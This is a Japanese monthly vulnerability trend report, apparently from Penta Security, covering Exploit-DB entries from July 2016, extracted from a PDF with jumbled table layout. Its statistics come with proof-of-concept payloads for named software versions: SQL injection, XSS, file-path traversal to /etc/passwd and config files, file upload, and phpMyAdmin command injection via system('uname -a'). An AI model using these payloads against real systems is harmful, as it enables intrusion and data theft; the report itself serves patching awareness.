2016.07 EDB-Report 最新Web脆弱性トレンドレポート(2016.07) 2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 2016年7月に公開されたExploit-DBの分析結果、クロスサイトスクリプティング(Cross Site Scripting)攻撃に対する脆弱性の報告件数が最も多く、攻撃パターンも多様に発見されました。該当脆弱性は、一般 的に発生するクロスサイトスクリプティング(Cross Site Scripting)脆弱性ではなく、特定プログラム上でのみ発生する脆弱性がほとんどでした。主なソフトウェア別脆弱性発生の現況を見ると、Wordpressから最も多 い脆弱性が発見されました。(*Wordpressで発見された脆弱性は、Wordpress自体の問題ではなく、特定Plug-inを使う際に発生し得る脆弱性がほとんどです。)該当脆弱性は、ParameterのValueに挿入さ れる形式であり、また特定なheaderを狙う脆弱性でした。脆弱性が発見されたプログラムやPlug-inを使用する管理者はアップデート事項の確認及び早急なアップデートが求められます。 1. 脆弱性別件数 脆弱性カテゴリ 16 件数 コマンド インジェクション (Command Injection) 1 コード・インジェクション (Code Injection) 1 ファイルアップロード (File Upload) 1 ローカルファイル挿入 (Local File Inclusion:LFI) 3 危険度 早急対応要 高 合計 15 12 10 9 8 6 4 SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 2.危険度別分類 脆弱性別件数 14 9 3 2 1 1 1 0 15 30 危険度別分類 件数 2 28 30 割合 6.67% 93.33% 2 100.00% 早急対応要 高 28 3. 攻撃実行の難易度別件数 難易度 難 中 易 合計 件数 2 7 21 30 割合 6.67% 23.33% 70.00% 攻撃実行の難易度別件数 2 100.00% 難 7 中 易 21 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 Wordpress OpenFire AWBS Ktools eCardMAX IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script Streamo 合計 件数 5 5 5 3 2 1 1 1 1 1 1 1 1 1 1 30 主なソフトウェア別脆弱性発生件数 Wordpress 1 1 1 OpenFire 5 AWBS 1 Ktools 1 eCardMAX 1 IPS Community Suite 1 1 5 1 CodoForum Tiki Wiki PaKnPost 1 Django PhpMyAdmin 2 3 5 PHP File Vault Joomla php Real Estate Script EDB-Report 最新Web脆弱性トレンドレポート(2016.07) 2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2016-07-04 40058 SQL Injection 易 高 eCardMAX 10.5 - index.php SQL Injection 脆弱性 /ecardmaxdemo/admin/index.php?step=admin_sho w_keyword&what=&row_number=10%20order%2 0by%201--&search_year=2016&page=2 eCardMAX eCardMAX 10.5 2016-07-06 40062 SQL Injection 中 高 Advanced Webhost Billing System (AWBS) 2.9.6 aomanage.php SQL Injection 脆 弱性 /admin/aomanage.php?search=1&cat=status%20U NION%20select%201,2,3,version%28%29,5,curre nt_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1--&list=3&so=status' AWBS Advanced Webhost Billing System (AWBS) 2.9. Ktools Ktools Photostore 4.7.5 eCardMAX eCardMAX 10.5 2016-07-04 40051 SQL Injection 難 早急対応要 Ktools Photostore 4.7.5 /photostore/gallery/Objects/24/ page1/ SQL Injection 脆弱性 POST / HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 postGalleryForm=1&gallerySortBy=media_id&gallery SortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND (0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) /ecardmaxdemo/admin/index.php?step=admin_me mber_display&search_field=all&keyword=%3Cscript %3Ealert(1)%3C%2Fscript%3E&cmd_button=Sear ch+User 2016-07-04 40058 XSS 易 高 eCardMAX 10.5 - index.php XSS 脆弱性 2016-07-04 40051 XSS 易 高 Ktools Photostore 4.7.5 workbox.php XSS 脆弱性 /photostore/workbox.php?mode=addToLightbox& mediaID=“><script>alert(/XSS/)</script> Ktools Ktools Photostore 4.7.5 2016-07-04 40051 XSS 易 高 Ktools Photostore 4.7.5 mgr.login.php XSS 脆弱性 /photostore/manager/mgr.login.php?username=de mo&password='><script>alert("XSS")</script><input type='hidden Ktools Ktools Photostore 4.7.5 2016-07-06 40062 SQL Injection 中 高 Advanced Webhost Billing System (AWBS) 2.9.6 /admin/hostingarchiveadmin.php?search=1&cat=sta hostingarchiveadmin.php SQL tus UNION select 1--&list=1&so=status' Injection 脆弱性 # AWBS Advanced Webhost Billing System (AWBS) 2.9. EDB-Report 最新Web脆弱性トレンドレポート(2016.07) 2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-07-06 EDB番号 40063 脆弱性カテゴリ File Upload 攻撃難脆弱性度 易 危険度 高 脆弱性名 攻撃コード POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/1.1 Host: Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) PaKnPost Pro 1.14 - select_.cgi Content-Type: multipart/form-data; boundary=------File Upload 脆弱性 --------------------7dd10029908f2 対象プログラム 対象環境 PaKnPost PaKnPost Pro 1.14 AWBS Advanced Webhost Billing System (AWBS) 2.9. AWBS Advanced Webhost Billing System (AWBS) 2.9. AWBS Advanced Webhost Billing System (AWBS) 2.9. OpenFire OpenFire 3.10.2 < 4.0.1 OpenFire OpenFire 3.10.2 < 4.0.1 OpenFire OpenFire 3.10.2 < 4.0.1 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="file"; filename="pnp-test.txt.cgi" Content-Type: application/octet-stream -----------------------------7dd10029908f2-- 2016-07-06 40062 XSS 中 高 Advanced Webhost Billing System (AWBS) 2.9.6 cmanage.php XSS 脆弱性 POST /admin/cmanage.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 reason=%22%3E%3Cscript%3Ealert%281%29% 3C%2Fscript%3E 2016-07-06 40062 XSS 中 高 Advanced Webhost Billing System (AWBS) 2.9.6 helpdesk.php XSS 脆弱性 POST /admin/helpdesk.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 hd_name="><script>alert(1)</script> 2016-07-06 2016-07-06 40062 40065 XSS XSS 中 易 高 高 Advanced Webhost Billing System (AWBS) 2.9.6 omanage.php XSS 脆弱性 OpenFire 3.10.2 - 4.0.1 server2server-settings.jsp XSS 脆弱性 /omanage.php?search=1%22%3E%3Cscript%3Eal ert%283%29%3C/script%3E&cat=status%22%3E %3Cscript%3Ealert%284%29%3C/script%3E&list =4%22%3E%3Cscript%3Ealert%282%29%3C/scr ipt%3E&so=status%22%3E%3Cscript%3Ealert%2 81%29%3C/script%3E POST /server2server-settings.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 domain=%22%2F%3E%3Cscript%3Ealert%28%2 7XSS%27%29%3C%2Fscript%3E&remotePort=52 69&serverAllowed=Add+Server 2016-07-06 2016-07-06 40065 40065 XSS XSS 易 易 高 高 /plugins/search/advance-userOpenFire 3.10.2 - 4.0.1 search.jsp?search=true&moreOptions=false&criteria advance-user-search.jsp XSS 脆 =admin%22/%3E%3Cscript%3Ealert%28%27XSS 弱性 %27%29%3C/script%3E&search=Search POST /muc-service-edit-form.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 OpenFire 3.10.2 - 4.0.1 - muc- Accept: */* service-edit-form.jsp XSS 脆弱性 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 save=true&mucname=test&mucdesc=test%22%2F %3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E EDB-Report 最新Web脆弱性トレンドレポート(2016.07) 2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-07-06 EDB番号 40065 脆弱性カテゴリ XSS 攻撃難脆弱性度 易 危険度 高 脆弱性名 攻撃コード POST /plugins/search/search-props-edit-form.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko OpenFire 3.10.2 - 4.0.1 Chrome/16.0.912.75 Safari/535.7 search-props-edit-form.jsp XSS Accept: */* 脆弱性 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 対象プログラム 対象環境 OpenFire OpenFire 3.10.2 < 4.0.1 OpenFire OpenFire 3.10.2 < 4.0.1 Wordpress WordPress Real3D FlipBook Plugin Streamo Streamo Online Radio And TV Streaming CM php Real Estate Script php Real Estate Script 3 searchEnabled=true&searchname=%22/%3E%3Cs cript%3Ealert('XSS')%3C/script%3E&groupOnly=fa lse 2016-07-06 2016-07-04 40065 40055 XSS XSS 易 易 高 高 /groupOpenFire 3.10.2 - 4.0.1 summary.jsp?search=test%22+onmouseover%3Dal group-summary.jsp XSS 脆弱性 ert%28%27XSS%27%29+x%3D%22 POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko WordPress Real3D FlipBook Chrome/16.0.912.75 Safari/535.7 Plugin - flipbooks.php XSS 脆弱 Accept: */* 性 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=delete&bookId=<script>alert(/makman/)</scr ipt> 2016-07-08 2016-07-08 40078 40076 SQL Injection LFI 難 易 高 高 /programs.php?id=999999.9%27%20union%20all %20select%20concat%280x7e%2C0x27%2Cunhe Streamo Online Radio And TV x%28Hex%28cast%28database%28%29%20as% Streaming CMS - programs.php 20char%29%29%29%2C0x27%2C0x7e%29%2C SQL Injection 脆弱性 0x31303235343830303536%20and%20%27x%2 7%3D%27x POST /admin/ajax_cms/get_template_content/ HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 php Real Estate Script 3 AppleWebKit/535.7 KHTML, like Gecko /admin/ajax_cms/get_template Chrome/16.0.912.75 Safari/535.7 _content/ LFI 脆弱性 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 tpl=../../private/config/db.php 2016-07-11 40082 XSS 易 高 GET / HTTP/1.1 WordPress All in One SEO Pack Plugin Host: 2.3.6.1 - / XSS 脆弱性 WordPress All Wordpress User-Agent: Abonti </pre><script>alert(1);</script> 2016-07-11 40080 LFI 易 高 2016-07-11 40084 Code Injection 易 高 Tiki Wiki CMS 15.0 flv_stream.php LFI 脆弱性 /player/flv/flv_stream.php?file=../../../db/local.php& position=0 Tiki Wiki in One SEO Pack Plugin 2.3.6.1 Tiki Wiki CMS 15.0 /index.php?app=core&module=system&controller= IPS IPS Community Suite 4.1.12.3 - index.php Code Injection 脆弱性 IPS Community Suite Community content&do=find&content_class=cms\Fields1{}phpi nfo();/* Suite 4.1.12.3 EDB-Report 最新Web脆弱性トレンドレポート(2016.07) 2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 POST /wp-login.php HTTP/1.1 Host: 2016-07-11 40083 XSS 易 高 User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; WordPress Activity Log Plugin 2.3.1 - wp-login.php XSS 脆弱性 charset=UTF-8 X-Forwarded-For: WordPress WordPress Activity Log Plugin 2.3.1 <script>alert(document.cookie);</script> log=wordpress&pwd=sdsdssdsdsd&wpsubmit=Log+In&redirect_to=http%3A%2F%2F192.16 8.28.135%2Fwp-admin%2F&testcookie=1 2016-07-14 40111 SQL Injection 易 高 Joomla Guru Pro (com_guru) Component - index.php SQL Injection 脆弱性 /index.php?option=com_guru&view=gurupcategs&l ayout=view&Itemid=1%20and%201=1--&lang=en Joomla Joomla Guru Pro (com_guru) Component POST /wp-admin/adminajax.php?action=spiderVeideoPlayerselectplaylist HTTP/1.1 Host: 2016-07-20 40137 SQL Injection 中 高 User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* WordPress Video Player Plugin 1.5.16 - SQL Injection Content-Type: application/x-www-form-urlencoded; WordPress Wordpress charset=UTF-8 Video Player Plugin 1.5.1 search_events_by_title=&page_number=0serch_or_n ot=&asc_or_desc=1&order_by=(CASE WHEN (SELECT sleep(10)) = 1 THEN id ELSE title END) ASC #&option=com_Spider_Video_Player&task=select_pl aylist&boxchecked=0&filter_order_playlist=&filter_or der_Dir_playlist= POST /index.php HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2 2016-07-20 40129 XSS 易 高 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="to_field" Django CMS 3.3.0 /en/admin/djangocms_snippet/ id snippet/2/ XSS 脆弱性 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="name" Django Django CMS 3.3.0 CodoForum CodoForum 3.2.1 PHP File Vault PHP File Vault 0.9 test <img src="x">%20%20>"<iframe src="a">%20<iframe> "><"<img src="x">%20%20>"<iframe src=a><script>alet(1);</script><iframe> -----------------------------7dd10029908f2-- 2016-07-25 40150 SQL Injection 中 高 /forum/index.php?u=/user/profile/1%20AND%20( SELECT%202*(IF((SELECT%20*%20FROM%20(SE CodoForum 3.2.1 - index.php LECT%20CONCAT((MID((IFNULL(CAST(CURRENT_U SQL Injection 脆弱性 SER()%20AS%20CHAR),0x20)),1,451))))s),%2084 46744073709551610,%20844674407370955161 0))) 2016-07-26 40163 LFI 易 高 PHP File Vault 0.9 /htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F. /htdocs/fileinfo.php LFI 脆弱性 .%2F..%2Fetc%2Fpasswd EDB-Report 最新Web脆弱性トレンドレポート(2016.07) 2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-07-29 EDB番号 40174 脆弱性カテゴリ SQL Injection 攻撃難脆弱性度 易 危険度 高 脆弱性名 攻撃コード POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 Wordpress Ultimate Product AppleWebKit/535.7 KHTML, like Gecko Catalog 3.9.8 - (do_shortcode Chrome/16.0.912.75 Safari/535.7 via ajax) Blind SQL Injection Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 対象プログラム 対象環境 Wordpress Wordpress Ultimate Product Catalog 3.9.8 id=1+OR+SLEEP(10)+--+ POST /tbl_find_replace.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko 2016-07-29 40185 Command Injection 易 早急対応要 Chrome/16.0.912.75 Safari/535.7 PhpMyAdmin 4.6.2 - tbl_find_replace.php Command Injection 脆弱性 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 replaceWith=system('uname -a'); PhpMyAdmin PhpMyAdmin 4.6.2
© Copyright 2025 ExpyDoc